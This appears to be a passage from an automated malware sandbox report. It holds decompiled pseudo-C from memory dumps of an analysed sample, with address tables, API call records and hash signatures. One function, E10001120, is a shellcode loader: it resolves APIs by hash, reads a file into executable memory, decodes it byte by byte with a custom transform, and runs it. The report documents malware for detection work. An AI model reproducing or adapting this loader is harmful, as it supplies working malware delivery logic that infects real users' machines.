												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406c2e
0x00406c2e
0x00406c32
0x00406c5b
0x00406c65
0x00406c34
0x00406c3d
0x00406c4a
0x00406c4d
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00406f91
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00000000
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x00407013
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00406f94
0x00406f91

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45

Uniqueness

Uniqueness Score: -1.00%

Function 10001120, Relevance: 4.7, APIs: 3, Instructions: 152
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E10001120(void* __eflags) {
				signed int _v8;
				short _v528;
				signed int _v529;
				signed int _v536;
				intOrPtr _v540;
				void* _v544;
				long _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _t156;

				_v8 =  *0x10003028 ^ _t156;
				_v536 = 0;
				_v556 = 0;
				_v540 = E10001000();
				_v568 = E10001070(_v540, 0x8a111d91);
				_v560 = E10001070(_v540, 0xcbec1a0);
				_v564 = E10001070(_v540, 0xa4f84a9a);
				_v572 = E10001070(_v540, 0x170c1ca1);
				_v580 = E10001070(_v540, 0x433a3842);
				_v576 = E10001070(_v540, 0xa5f15738);
				_v560(0x103,  &_v528);
				_v564( &_v528, 0x10003000);
				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
				_v548 = _v572(_v552, 0);
				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
				ReadFile(_v552, _v544, _v548,  &_v556, 0);
				_v536 = 0;
				while(_v536 < _v556) {
					_v529 =  *((intOrPtr*)(_v544 + _v536));
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					_v529 = (_v529 & 0x000000ff) >> 0x00000006 | (_v529 & 0x000000ff) << 0x00000002;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					_v529 =  ~(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - 0x6a;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - _v536;
					_v529 = (_v529 & 0x000000ff) >> 0x00000007 | (_v529 & 0x000000ff) << 0x00000001;
					 *((char*)(_v544 + _v536)) = _v529;
					_v536 = _v536 + 1;
				}
				_v544();
				return E10001469(_v8 ^ _t156);
			}

0x10001130
0x10001133
0x1000113d
0x1000114c
0x10001166
0x10001180
0x1000119a
0x100011b4
0x100011ce
0x100011e8
0x100011fa
0x1000120c
0x10001231
0x10001246
0x10001262
0x10001286
0x1000128c
0x100012a7
0x100012c7
0x100012d6
0x100012e9
0x10001305
0x10001318
0x10001327
0x1000133a
0x10001349
0x1000135c
0x1000136b
0x1000137b
0x1000138a
0x1000139d
0x100013b8
0x100013d0
0x100012a1
0x100012a1
0x100013d7
0x100013ea

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286

Memory Dump Source

Source File: 00000004.00000002.2163547953.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2163531689.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2163592483.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2163618148.0000000010004000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
Instruction ID: 83d81e531b48bbb665f37a7df122501d88c9d55b6a80c66f86e06f7556a42c30
Opcode Fuzzy Hash: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
Instruction Fuzzy Hash: 03715174C462BC9ADB21CBA49C9CBECBFB09F5A201F0481C9E59C66286C6345FC4CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0040329A, Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040329A(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x41f8fc; // 0x8904f
				_t34 = _t32 -  *0x40b868 + _a4;
				 *0x424750 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E00403419( *0x41f90c);
				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
				 *0x41f908 = _t34;
				 *0x41f8f8 = 0;
				while(1) {
					_t10 =  *0x41f900; // 0x923f7
					_t31 = 0x4000;
					_t11 = _t10 -  *0x41f90c;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403403(0x4138f8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x41f90c =  *0x41f90c + _t31;
					 *0x40b888 = 0x4138f8;
					 *0x40b88c = _t31;
					L6:
					L6:
					if( *0x424754 != 0 &&  *0x424800 == 0) {
						_t19 =  *0x41f908; // 0x831db
						 *0x41f8f8 = _t19 -  *0x41f8fc - _a4 +  *0x40b868;
						E00402E52(0);
					}
					 *0x40b890 = 0x40b8f8;
					 *0x40b894 = 0x8000; // executed
					_t14 = E00406776(0x40b870); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b890; // 0x40db5c
					_t37 = _t36 - 0x40b8f8;
					if(_t37 == 0) {
						__eflags =  *0x40b88c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x41f8fc; // 0x8904f
						if(_t16 -  *0x40b868 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b868 =  *0x40b868 + _t37;
					_t49 =  *0x40b88c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x0040329d
0x004032aa
0x004032bd
0x004032c2
0x004033f2
0x004033f4
0x00000000
0x004033fa
0x004032ce
0x004032e1
0x004032e7
0x004032ed
0x004032f8
0x004032f8
0x004032fd
0x00403302
0x0040330a
0x0040330c
0x0040330c
